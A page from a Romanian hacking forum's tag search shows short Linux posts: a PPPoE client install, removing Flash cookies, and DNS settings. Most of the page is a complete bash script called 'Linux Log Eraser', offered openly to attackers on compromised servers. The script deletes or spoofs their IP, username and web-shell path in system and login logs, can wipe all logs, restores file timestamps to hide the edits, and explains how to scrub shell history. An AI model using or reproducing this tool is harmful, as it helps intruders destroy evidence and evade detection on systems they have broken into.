Jump to content

Search the Community

Showing results for tags 'linux'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Linux Graphic PPPoE/PPTP/3G/Mobile Client https://code.google.com/p/graphic-pppoe-client/ Depends: $ sudo apt-get install ppp pptp-linux hal python python-gtk2 python-gconf python-notify Download Ubuntu / Debian / Linux Mint: $ wget http://graphic-pppoe-client.googlecode.com/files/graphic-pppoe-pptp-client_0.6~all.deb Install: $ sudo dpkg -i graphic-pppoe-pptp-client_0.6~all.deb Se poate face PPPoE/PPTP si prin placa wireless.
  2. Utilizatorii sistemului de operare Linux pot interzice definitv stocarea de cookie-uri Adobe's Flash Player. Este o idee buna din cauza faptului ca Flash Player ca plugin, nu detecteaza cand browserul web se afla in modul de navigare privat (Private Browsing mode). Ca si celelalte tipuri de cookie-uri web, multi dintre noi nu prea avem habar multi ce rol au si ce fac ele, dar un lucru este sigur: monitorizeaza si furnizeaza date despre navigarea pe web. Totusi, aceste cookie-uri Flash pot fi gasite si sterse. Si chiar interzise a fi stocate definitiv, daca folosim Linux. Se deschide o fereastra terminal si se foloseste comanda "su" pentru a avea acces superuser (root user status). Daca rulati Ubuntu sau alta distributie Linux ce foloseste ideea de acces de superutilizator, folositi doar prefixul "sudo" inaintea tuturor comenzilor. Pentru a gasi cookie-urile Flash Player in propriul sistem, utilizati comanda de cautare "find -iname '*.sol'" si va va aparea o lista cu o gramada de fisiere in subdirectorul "./.macromedia" din directorul "/home/userid". Cel mai probabil veti dori sa le stergeti pe toate, dar pentru a nu strica ceva, cel mai bine facem o salvare de siguranta. Folosim comanda "mkdir ./.macromedia.sav" si comanda "cp -a ./.macromedia/* ./.macromedia.sav/". Apoi putem sterge acel director si toate fisierele cookie Flash Player folosind "rm -rf ./.macromedia". Apoi, creeam o legatura intre acel director si directorul /dev/null cu comanda "ln -s /dev/null ./.macromedia", dupa care verificam legatura creata cu comanda "ls -al ./.macromedia" Ca rezultat ar trebui sa avem afisat pe ecran "./.macromedia -> /dev/null". Se lanseaza in executie browser-ul web si se navigheaza pe web catre un site unde putem vedea continut Flash si pentru a ne asigura ca putem viziona continutul. Pentru a putea reveni la situatia anterioara folosim: "mv ./.macromedia.sav ./.macromedia" si "chown userid:userid ./.macromedia", unde userid este ID-ul de utilizator al userului (altul decat root) pe care am facut incercarea. Daca totul e ok iar Flash Playerul nu "crapa", putem sterge salvarea de siguranta cu "rm -rf ./.macromedia.sav" pe care am facut-o mai devreme. Se poate face acelasi lucru si cu directorul "./.adobe/Flash_Player" daca acesta exista. O abordare similara a situatiei o putem face si cu Apple's Mac OS X, fiind conceput pe baza BSD Unix si care este similar cu Linux.
  3. De multe ori ( mai des in ultima vreme ) am intampinat problema "vitala" a Linux-ului : aceea a update-urilor prin repos. Nu stiu din ce cauza, ( Multi zic de la trecerea la IPv6 ) dar devenea stresant cand nu puteai sa faci update-uri la diferite programe etc. De aceea scriu acest mic tutorial Solutia dureaza mai putin de 1 min: System ? Preferences ? Network Connections Gasim conexiunea actuala ( cablu/wireless/etc) la care editam urmatoarele din tab-ul "IPv4 Settings": Method: Default este Automatic (DHCP) , inlocuim cu Automatic (DHCP) adresses only. Mai adaugam la DNS Servers : Google - 8.8.8.8, 8.8.4.4 si OpenDNS ( adaugand acestea mi-a rezolvat problema ) - 208.67.222.222, 208.67.220.220; Adaugati-le pe toate ( separate de virgula ) si ar trebuii sa mearga; PS:Mi-a mers pe RDS, nu stiu daca merge si pe alte retele ( Unele ISP-uri din state au restrictii la anumite dns-uri de ex.) **Fail title
  4. LINUX LOG ERASER by b0nd #! /bin/bash # June 2011 clear # A separate file to contain the absolute path for log files. Do edit that per your requirement source log_files.sh # Scroll to the end of code to see the progrom flow # The following arrays would only store the names of the log files found on system # Not making them read-only as they have to be edited later to add in the existing log file names found_ascii_log_files=() found_binary_log_files=() rtr="" # A global variable needed to get array back as a return value from "check_time_stamping" function flag=0 # A global variable to determine whether the back door path has to be deleted or not spoof_user="root" # All the entries for the "user_name" spoofing would be replaced by string "root" in non-ASCII log files # Default banner of the script default_banner () { cat << EOF ############################################################################ Linux Machine Log-Eraser Script Ver 0.3 - Third Release Greetz to: GGGGGG\ GG __GG\ GG / \__| aaaaaa\ rrrrrr\ aaaaaa\ gggggg\ eeeeee\ GG |GGGG\ \____aa\ rr __rr\ \____aa\ gg __gg\ ee __ee\ GG |\_GG | aaaaaaa |rr | \__|aaaaaaa |gg / gg |eeeeeeee | GG | GG |aa __aa |rr | aa __aa |gg | gg |ee ____| \GGGGGG |\aaaaaaa |rr | \aaaaaaa |\ggggggg |\eeeeeee\ \______/ \_______|\__| \_______| \____gg | \_______| gg\ gg | gggggg | \______/ Usage: $0 [options] -h help ############################################################################ EOF call_exit } # Help banner of the script. It depicts the usage of various options help_banner () { cat << EOF GGGGGG\ GG __GG\ GG / \__| aaaaaa\ rrrrrr\ aaaaaa\ gggggg\ eeeeee\ GG |GGGG\ \____aa\ rr __rr\ \____aa\ gg __gg\ ee __ee\ GG |\_GG | aaaaaaa |rr | \__|aaaaaaa |gg / gg |eeeeeeee | GG | GG |aa __aa |rr | aa __aa |gg | gg |ee ____| \GGGGGG |\aaaaaaa |rr | \aaaaaaa |\ggggggg |\eeeeeee\ \______/ \_______|\__| \_______| \____gg | \_______| gg\ gg | \gggggg | \______/ Usage ===== $0 options OPTIONS: -h help Show this message -i [ip_address] Search for a particular ip_address in all log files and search for top 30 IP's logged in log files -d [ip_address] Delete the ip_address from log files -s [spoof_ip_address] Spoof the IP following -d with the one following -s wherever deletion is not possible -u [user_name] The user name whose logs are to be erased/spoofed -w [web_shell_path] The web back door (e.g. c99) shell absolute path you wish to erase from logs -f fuck logs files To erase all log files completely, not recommended though -e "file extensions" To find other backdoors planted on system -r [web_root_directory] The web root directory to start searching backdoors from Ex: $0 -h * To show this help message Ex: $0 -i 192.168.1.7 * To search 192.168.1.7 in all logs files. Basically finding which logs files have trace of it, and * In addition to that, search all log files (/var/log/*) and show Top 30 most logged IP's in log files. * They could be good choices for spoofing Ex: $0 -d 192.168.1.7 -s 10.1.1.7 -u "cracker" * To delete lines containing 192.168.1.7 and|or user_name "cracker" from ASCII files, and * To spoof 192.168.1.7 in non-ASCII files by 10.1.1.7 and user_name "cracker" by "root" Ex: $0 -d 192.168.1.7 -s 10.1.1.7 -u "cracker" -w "/var/www/xyz.com/uploads/c99.php" * To delete lines containing 192.168.1.7 and|or user_name "cracker" and|or web_shell_path from ASCII files, and * To spoof 192.168.1.7 in non-ASCII files by 10.1.1.7 and user_name "cracker" by "root" Ex: $0 -f * To erase all log files listed in log_files.sh completely (not recommended) Ex: $0 -e "php txt asp" -r /var/www * To search for probable web backdoors planted on system. Once found, it is recommended to verify the result * The current example searches for files having extensions php or txt or asp in /var/www and subdirectories * Extensions and web_root_directory are customizable [!] Stick to the above OPTION combinations only, else the script might not work properly Author ====== b0nd, b0nd.g4h@gmail.com and www.garage4hackers.com EOF call_exit } # Checking and storing the log files found on system existing_log_files () { for i in ${ascii_log_files[@]} # Accessing all the array entries declared at the top (log_files.sh) do if [ -f $i ]; then found_ascii_log_files[ $j ]=$i # fetching the found log files to our empty array j=$[$j + 1] fi done for i in ${binary_log_files[@]} # Accessing all the array entries declared at the top (log_files.sh) do if [ -f $i ]; then found_binary_log_files[ $j ]=$i # fetching the found log files to our empty array j=$[$j + 1] fi done } # Basic Information which might help user customizing script for the first time search_log_files () { echo -e "\n>>>>>>>>>>>>> Basic Information <<<<<<<<<<<< \n" echo -e "[*] Linux Kernel: `uname -a`" echo -e "\n[*] The various log files found on system (per our script log_files.sh database):" j=0 # following is the call to function to determine the log files found on system existing_log_files echo -e -n "\n\t[*] ASCII Log Files\n" for i in ${found_ascii_log_files[@]} do echo -e "\t\t$i" done echo -e -n "\n\t[*] Binary Log Files\n" for i in ${found_binary_log_files[@]} do echo -e "\t\t$i" done # The following code is to find all the log files containing the IP fetched to parameter -i # e.g. this should be the IP which attacker is willing to find and erase/spoof in log files verify_ip $search_ip # The value for search_ip is obtained from command line arguments (parameter -i) echo -e "\n[*] Searching for IP $search_ip in all non-zip log files (/var/log/*)" # The following won't check the zipped files. # It's affecting the atime value, and nothing has been coded to restamp the atime against this grep command if [[ "`grep -rlw $search_ip /var/log*`" == "" ]] then echo -e "\n\t[*] Cool! The IP $search_ip does not have trace in any log file" else echo -e "\n\t[*] The IP $search_ip has appeared in following log files:" grep -rlw $search_ip /var/log/* | awk ' { print " " $1 } ' fi # The following would check for gz files in /var/log directory. Hard binded for .gz extension. Make it generic if needed have_zgrep=`which zgrep` # It's affecting the atime value, and nothing has been coded to restamp the atime against this zgrep command if [[ "$have_zgrep" == "" ]] then echo -e "\n[*] zgrep could not be found on system" echo -e "\n\t[*] Skipping searching zip files for IP matching. Take care yourself :)" else echo -e "\n[*] zgrep found on system, so checking zip files as well." if [[ "`zgrep -lw $search_ip /var/log/*.gz`" == "" ]] then echo -e "\n\t[*] Cool! The IP $search_ip does not have trace in any zip log file (/var/log/*)" else echo -e "\n\t[*] The IP $search_ip has appeared in following zip log files in /var/log directory:" echo -e "\n\t[*] The script in current form does not edit zip files. Take care of your (|) yourself" zgrep -lw $search_ip /var/log/*.gz | awk ' { print " " $1 } ' fi fi echo -e "\n\t[!] It is recommended to include the above found log files, if not already in the list, in the script (log_files.sh)" echo -e "\t[!] Edit the file log_files.sh per your requirements" # Finding the IP's listed in all log files. The most common IP's could be a good choice for spoofing your original IP # Display Top 20 IP's to make choice from echo -e "\n[*] Displaying top 20 IP addresses found in log files" echo -e "\n\t[*] It is recommended to choose any suitable one among them to spoof your IP" touch tmp-counter.txt local ip_counter=0 echo -e -n "\n\tPlease wait " # It's affecting the atime value, and nothing has been coded to restamp the atime against this grep command # The following grep command would find all the IP look alikes present in all the log files in /var/log/*. # The sort will finally give the uniqe ones for i in $(grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/* | grep -i ":" | cut -d ":" -f2 | sort -u) do # The following grep command is same as above but missing the trailing sort -u, hence all the multiple occurence would be listed. # This would help in finding out the occurence of each IP in log files i.e., take one IP from the uniqe list and compare it with # all the IP's in unsorted list, whenever there is a match, that would indicate re-occurence and hence the ip_counter would increase by 1 for j in $(grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/* | grep -i ":" | cut -d ":" -f2) do if [[ $i == $j ]] then ip_counter=$[$ip_counter + 1] fi done echo -e -n "." echo "$ip_counter number of times $i has occured in log files" >> tmp-counter.txt ip_counter=0 done echo -e "\n\n\t[*] TOP 20 IP (look alikes) found in log files:\n" cat tmp-counter.txt | sort -g -r | head -n 20 | awk ' { print " " $1 " times -----> " $5 } ' rm tmp-counter.txt call_exit } call_exit () { echo -e "\n[*] Exiting.....\n" #cat << EOF echo -e "\n\t\tWould you mind removing script execution traces from history?" echo -e "\t\t=============================================================" echo -e " ==> http://www.garage4hackers.com/showthread.php?1032-Linux-HISTORY-How-to-avoid-getting-logged\n" # 1. Do not get logged; use the space technique. # # echo \$HISTCONTROL # if the output in not "ignorespace" (without quotes); do # # export HISTCONTROL=ignorespace # Now just give a space in front of any command and it would not be logged in history # 2. Another way of not getting logged: # # history -d \$((HISTCMD-1)) && type_your_command_here_and_execute # e.g # history -d \$((HISTCMD-1)) && whoami # 3. If the script has already been executed without taking precautions, either of the following can be done # to remove the traces: # a) # history -d \$((HISTCMD-2)) && history -d \$((HISTCMD-1)) # The above command would remove the last entry from history. # Executing it couple of times would delete couple of entries # # history # Note down the command number and then execute: # # history -d offset # It would delete the respective entry from history # c) To delete a group of consecutive commands # Let us assume there are 50 commands in history and you wish to delete commands from 30 to 50 # # for i in {51..30}; do history -d "\$i"; done; #EOF exit } fuck_log_files () { # following is the call to function to determine the log files found on system existing_log_files echo "FTW! Erasing all log files" for i in ${found_ascii_log_files[@]} do echo -e "\t[*] Erasing $i..." > $i done for i in ${found_binary_log_files[@]} do echo -e "\t[*] Erasing $i..." > $i done echo "Done!" call_exit } verify_ip () { # First check is to verify that the chars entered as IP are integers # Second check has been made to confirm that only 3 dots are there in IP address # Third check is to mark the valid IP range. The octect value can not be < 0 or > 255 str="$1" # $1 is the first function parameter i.e. IP address here cnt=${#str} # Counting the length of string fetched i.e total chars in IP address, including dots dot_counter=0 for ((i=0; i < cnt; i++)) do char=${str:$i:1} # Reading one character at a time from the input string. Taken from http://www.unix.com/unix-dummies-questions-answers/80215-access-each-character-string.html #code=`printf %s "$char" | od -An -vtu1 | sed 's/^[^1-9]*//'` # copied from http://unix.derkeiler.com/Newsgroups/comp.unix.shell/2004-08/0195.html code=`printf '%d' "'$char"` # Echo the ASCII value of character # The first check if [ $code -lt 48 ] || [ $code -gt 57 ] # Comparing the ASCII value range of Intergers ( 48 - 57 ) then if [ $code -ne 46 ] # To check the "." value then echo -e "\n[*] Err!!! Not a valid IP (some non-integer characters), try again.....\n" call_exit else dot_counter=$[$dot_counter + 1] fi fi done # The second check if [ $dot_counter -ne 3 ] then echo -e "\n[*] Err!!! Not a valid IP (check the number of dots in IP Address), try again.....\n" call_exit fi # The third check # Extract the octets octet_a=`echo $1 | cut -d "." -f1` octet_b=`echo $1 | cut -d "." -f2` octet_c=`echo $1 | cut -d "." -f3` octet_d=`echo $1 | cut -d "." -f4` if [ \( $octet_a -lt 0 -o $octet_a -gt 255 \) -o \( $octet_b -lt 0 -o $octet_b -gt 255 \) -o \( $octet_c -lt 0 -o $octet_c -gt 255 \) -o \( $octet_d -lt 0 -o $octet_d -gt 255 \) ] then echo -e "\n[*] Err!!! Not a valid IP (octet value >=0 and <=255), try again.....\n" call_exit fi } # A function to verify whether the user name fetched to script exists or not # The script will not delete any log line based on user-name "root", else most of the logs would get delete verify_user_name () { local user_name="$1" # $1 is the first function parameter i.e. user-name here if [ $user_name != "root" ] then if [[ `cat /etc/passwd | cut -d ":" -f1 | grep $user_name` != $user_name ]] then echo -e "\t[*] User name does not exist" echo -e "\t[*] Instead of exiting, script will proceed considering you wish to delete logs of some old account which does not exist anymore" else echo -e "\t[*] user_name ($user_name) verified!" fi else echo -e "\t[*] User name is 'root'. Script will still take care not to delete lines based on this user name" echo -e "\t[*] user_name ($user_name) verified!" fi } # A function to obtain the original time stamping of the log file before editing the file check_time_stamping () { echo -e "======================================================================" filename=$1 echo -e "\n[*] Log File Under RADAR: $filename" local atime=`stat -c "%x~%y~%z" ${filename} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` local mtime=`stat -c "%x~%y~%z" ${filename} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` local array=() array=($atime $mtime) rtr=(${array[@]}) # rtr is a global variable } # The function to edit the log files and restore the Time (time stamping) edit_ascii_file_and_timestamping () { for log_file in ${found_ascii_log_files[@]} # It's a global array and declared at the top of code do # Calling check_time_stamping function to get the original time stamps before touching the files echo "inside for loop" check_time_stamping $log_file out=(${rtr[@]}) atime=${out[0]} mtime=${out[1]} echo -e "\n[*] Time Stamping before editing the log file" echo -e "\tatime: $atime" echo -e "\tmtime: $mtime" # Edit only that file which has the desired string/IP in it. Don't touch others unnecessary. # The following if and grep stuff does the same. If found IP in file then edit else don't. Err! haven't followed strictly # -w is needed else if you intend to delete 192.168.1.1, it would delete all 192.168.1.1* as well if grep -qsw "$1" "$log_file" # $1 is the parameter passed to this function, IP in this case then echo -e "\n[*] The IP $1 found in $log_file ... so proceeding editing it" echo "Sleeping for 5 sec" echo -e "\n[*] Editing log file --> $log_file" sleep 5 sed "/$1/d" $log_file > $log_file.new mv $log_file.new $log_file fi if [ $2 != 'root' ] # $2 is the 2nd parameter passed to this function, User name in this case then if grep -qsw "$2" "$log_file" # If user name fetched to script found in log file and that is not 'root' then echo -e "\n\n[*] The username $2 found in $log_file ... so proceeding editing it" echo "Sleeping for 5 sec" echo -e "\n[*] Editing log file --> $log_file" sleep 5 sed "/$2/d" $log_file > $log_file.new mv $log_file.new $log_file fi fi if [ $flag -eq 1 ] # flag=1 states that a web shell path too has to be removed from log files then echo -e "\nflag = 1, Deleting Backdoor Shell PATH: $3" sed -e "s@$3@@g" $log_file > $log_file.new mv $log_file.new $log_file fi # The following time stamping is necessary irrespective of whether the IP was found in file or not. # Because at least the file has been accessed while grep(ing) to search the content # So the atime has to be restored # Restoring mtime as well though with more code it can be skipped if value is not found in log file aatime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` amtime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` # actime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f3 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` echo -e "\n[*] Time Stamping after editing the log file" echo -e "\tatime: $aatime" echo -e "\tmtime: $amtime" # echo "ctime: $actime" echo -e "\n[*] Restoring the time stamp........." touch -at $atime $log_file touch -mt $mtime $log_file #touch -ct $ctime $log_file aaatime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` aamtime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` # aactime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f3 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` echo -e "\n[*] Time Stamping after restoring the time stamp" echo -e "\tatime: $aaatime" echo -e "\tmtime: $aamtime" # echo "ctime: $aactime" echo -e "\n======================================================================\n\n" done } edit_binary_file_and_timestamping () { for log_file in ${found_binary_log_files[@]} # It's a global array and declared at the top of code do # Calling check_time_stamping function to get the original time stamps before touching the files check_time_stamping $log_file out=(${rtr[@]}) atime=${out[0]} mtime=${out[1]} # ctime=${out[2]} echo -e "\n[*] Time Stamping before editing the log file" echo -e "\tatime: $atime" echo -e "\tmtime: $mtime" echo -e "\nSpoofing IP $1 in binary log file with IP $2" echo "Sleeping for 5 sec" sleep 5 sed "s/$1/$2/g" $log_file > $log_file.new mv $log_file.new $log_file if [ $3 != 'root' ] then echo -e "\nSpoofing user name..." echo "Sleeping for 5 sec" sleep 5 sed "s/$3/$spoof_user/g" $log_file > $log_file.new # Edit the global variable spoof_user at the top mv $log_file.new $log_file fi # The following time stamping is necessary irrespective of whether the IP was found in file or not. # Because at least the file has been accessed while grep(ing) to search the content # So the atime has to be restored # Restoring mtime as well though with more code it can be skipped if value is not found in log file aatime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` amtime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` echo -e "\n\nTime Stamping after editing the log file" echo "atime: $aatime" echo "mtime: $amtime" echo -e "\nRestoring the time stamp........." touch -at $atime $log_file touch -mt $mtime $log_file aaatime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` aamtime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` echo -e "\nTime Stamping after restoring the time stamp" echo "atime: $aaatime" echo "mtime: $aamtime" echo -e "\n======================================================================\n\n" done } verify_IPs_and_user_name () { echo "[*] Verifying ip_address $ip_to_be_deleted ..." verify_ip $ip_to_be_deleted # Passing the fetched IP as argument to verify_ip function echo -e "\t[*] ip_address ($ip_to_be_deleted) verified!\n" echo -e "\n[*] Verifying spoof_ip_address $spoof_ip ..." verify_ip $spoof_ip # Passing the fetched IP as argument to verify_ip function echo -e "\t[*] spoof_ip_address ($spoof_ip) verified!\n" echo -e "\n[*] Verifying user_name: '$user_name' ..." verify_user_name $user_name } search_web_backdoor_shells () { for extension in ${extension_type[@]} # Now the array already holds the various backdoor extensions fetched do echo -e "\n\t[*] Checking for Extension: $extension" sleep 1 # The following would find and display + outputs the result to a text file grep -RPl --include=*.$extension "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" $web_root_directory | tee -a output.txt | awk ' { print " " $1 } ' done echo -e "\n\t[!] Done! The out put has been stored in output.txt in append mode. Do not forget to delete it.\n" call_exit } lets_begin_the_show () { # Check: If "-e" and "-r", then just find the back door shells and exit if [[ -n $web_root_directory ]] then search_web_backdoor_shells # Check: If non "-e"|"-r" then proceed with deleting logs etc. elif [[ -n $ip_to_be_deleted ]] then verify_IPs_and_user_name if [[ -z $web_shell_path ]] then # Call the function with 2 values; no web shell path has been fetched. No spoofing, just delete the lines. edit_ascii_file_and_timestamping $ip_to_be_deleted $user_name else # Call the function with 3 values; delete web shell path as well. No spoofing, just delete the lines. flag=1 edit_ascii_file_and_timestamping $ip_to_be_deleted $user_name $web_shell_path fi # Call the function to spoof the original IP and user name. No deletion, just spoofing (they being binary files). edit_binary_file_and_timestamping $ip_to_be_deleted $spoof_ip $user_name else echo -e "\nSome issue which I could not catch" call_exit fi } verify_combination_of_command_line_arguments () { # Check 1: None of the argument has been passed if [[ -z $ip_to_be_deleted ]] && [[ -z $spoof_ip ]] && [[ -z $user_name ]] && [[ -z $extension_type ]] && [[ -z $web_root_directory ]] then echo -e "\n[*] Error! None of the required argument has been passed" default_banner call_exit fi # Check 2: Nothing should be passed in combination with "-e" and "-r" if ( [[ -n $extension_type ]] || [[ -n $web_root_directory ]] ) && ( [[ -n $web_shell_path ]] || [[ -n $ip_to_be_deleted ]] || [[ -n $spoof_ip ]] || [[ -n $user_name ]] || [[ -n $web_shell_path ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[-] Do not mix -e and -r with any other flag!" default_banner call_exit fi # Check 3: "-e" and "-r" shall be together if ( [[ -n $extension_type ]] && [[ -z $web_root_directory ]] ) || ( [[ -z $extension_type ]] && [[ -n $web_root_directory ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[*] -e and -r must be specified together and must be non-empty!" default_banner call_exit fi # Check 4: If one of the following, the first one, is stated then rest must be if [[ -n $ip_to_be_deleted ]] && ( [[ -z $spoof_ip ]] || [[ -z $user_name ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[-] Include -s and -u when -d specified!" default_banner call_exit fi # Check 5: If one of the following, the first one, is stated then rest must be if [[ -n $spoof_ip ]] && ( [[ -z $ip_to_be_deleted ]] || [[ -z $user_name ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[-] Include -d and -u when -s specified!" default_banner call_exit fi # Check 6: If one of the following, the first one, is stated then rest must be if [[ -n $user_name ]] && ( [[ -z $ip_to_be_deleted ]] || [[ -z $spoof_ip ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[-] Include -d and -s when -u specified!" default_banner call_exit fi # Check 7: If first one is stated, then rest must be if [[ -n $web_shell_path ]] && ( [[ -z $ip_to_be_deleted ]] || [[ -z $spoof_ip ]] || [[ -z $user_name ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[-] Include -d, -s and -u when -w specified!" default_banner call_exit fi } # ---------------------------------------- The program execution starts from here ------------------------------- #### Checking UID and EUID value #### #### Only allow root to execute this script as non-root might not have write access to log files if [ "$UID" != "0" ] then if [ "$EUID" != "0" ] then echo -e "\n[*] Cannot run script: Permission denied." "Please be root to use this script". call_exit fi fi #### Show default_banner if no argument has been passed if [ $# -eq 0 ] then default_banner fi # Following variables are for the command line arguments search_ip= ip_to_be_deleted= spoof_ip= user_name= web_shell_path= extension= # This one to handle the multiple extensions give to grep from command prompt web_root_directory= extension_type=() # This array will hold the multiple extensions j=0 while getopts ":hi:fd:s:u:w:e:r:" option do case $option in h) help_banner ;; i) search_ip=$OPTARG search_log_files ;; f) fuck_log_files ;; d) ip_to_be_deleted=$OPTARG # All the verifications would be done later once combination of command line arguments have been verified ;; s) spoof_ip=$OPTARG # Same as above ;; u) user_name=$OPTARG # Same as above ;; w) web_shell_path=$OPTARG echo "WEB-SHELL-PATH: $web_shell_path" # No verification could be done for it ;; e) for extension in $OPTARG do extension_type[ $j ]=$extension # Holding multiple extensions passed at command line j=$[$j + 1] done ;; r) web_root_directory=$OPTARG echo -e "\t[*] Web-Root Directory: $web_root_directory" ;; ?) echo -e "\n[*] Wrong argument passed" default_banner ;; esac done # Call to following function to verify the combination of command line arguments passed to script verify_combination_of_command_line_arguments # Following function call is necessary in order to find the available log files on system existing_log_files # Following function call would be made only after all the mandatory arguments have been passed to the script lets_begin_the_show Log File: ####################### # Declaration of two arrays containing the absolute path of log files. Add in more path per your requirements # Since declared outside any function, they are global # declare -r makes our array read-only and could not be altered anywhere in the code following the declaration ####################### # Those logs files which keep entries for IP address, web path accessed etc. Basically the ASCII log files. declare -r ascii_log_files=( #'/var/log/syslog' #'/var/log/messages' #'/var/log/httpd/access_log' #'/var/log/httpd/error_log' #'/var/log/xferlog' #'/var/log/secure' #'/var/log/auth.log' #'/var/log/user.log' # Check syslog.conf for more log files # Enter more log files here ) # Those logs files which keep user activity logs. Basically the non-ASCII log files. declare -r binary_log_files=( #'/var/log/wtmp' #'/var/log/lastlog' #'/var/log/btmp' #'/var/run/utmp' # Enter more log files here ) Usage: Linux Log Eraser ================ Linux Log Eraser is a bash script which erases almost all your logs from the log files on a Linux machine. This can be useful for an attacker to wipe out the traces before logging out of the compromised Linux machine. Usage ===== $0 options OPTIONS: -h help Show this message -i [ip_address] Search for a particular ip_address in all log files and search for top 30 IP's logged in log files -d [ip_address] Delete the ip_address from log files -s [spoof_ip_address] Spoof the IP following -d with the one following -s wherever deletion is not possible -u [user_name] The user name whose logs are to be erased/spoofed -w [web_shell_path] The web back door (e.g. c99) shell absolute path you wish to erase from logs -f fuck logs files To erase all log files completely, not recommended though -e "file extensions" To find other backdoors planted on system -r [web_root_directory] The web root directory to start searching backdoors from Ex: $0 -h * To show this help message Ex: $0 -i 192.168.1.7 * To search 192.168.1.7 in all logs files. Basically finding which logs files have trace of it, and * In addition to that, search all log files (/var/log/*) and show Top 20 most logged IP's in log files. * They could be good choices for spoofing Ex: $0 -d 192.168.1.7 -s 10.1.1.7 -u "cracker" * To delete lines containing 192.168.1.7 and|or user_name "cracker" from ASCII files, and * To spoof 192.168.1.7 in non-ASCII files by 10.1.1.7 and user_name "cracker" by "root" Ex: $0 -d 192.168.1.7 -s 10.1.1.7 -u "cracker" -w "/var/www/xyz.com/uploads/c99.php" * To delete lines containing 192.168.1.7 and|or user_name "cracker" and|or web_shell_path from ASCII files, and * To spoof 192.168.1.7 in non-ASCII files by 10.1.1.7 and user_name "cracker" by "root" Ex: $0 -f * To erase all log files listed in log_files.sh completely (not recommended) Ex: $0 -e "php txt asp" -r /var/www * To search for probable web backdoors planted on system. Once found, it is recommended to verify the result * The current example searches for files having extensions php or txt or asp in /var/www and subdirectories * Extensions and web_root_directory are customizable [!] Stick to the above OPTION combinations only, else the script might not work properly Author ====== b0nd, b0nd.g4h@gmail.com and www.garage4hackers.com Customizing the script while executing for the first time on target: ==================================================================== 1. Upload both, the linux_log_eraser.sh and log_files.sh on target server 2. Fire the linux_log_eraser script. Take care that you must be root (either UID=0 or EUID=0) to execute the script 3. Use parameter -i, and pass the IP address you are worried about in log files: ./linux_log_eraser -i 192.168.1.1 4. The above command will scan all the log files for that particular IP and will let you know all the log files having trace of that IP 5. Open up log_files.sh file. Cross check which log file, reported in step 4, is not in the list. Do 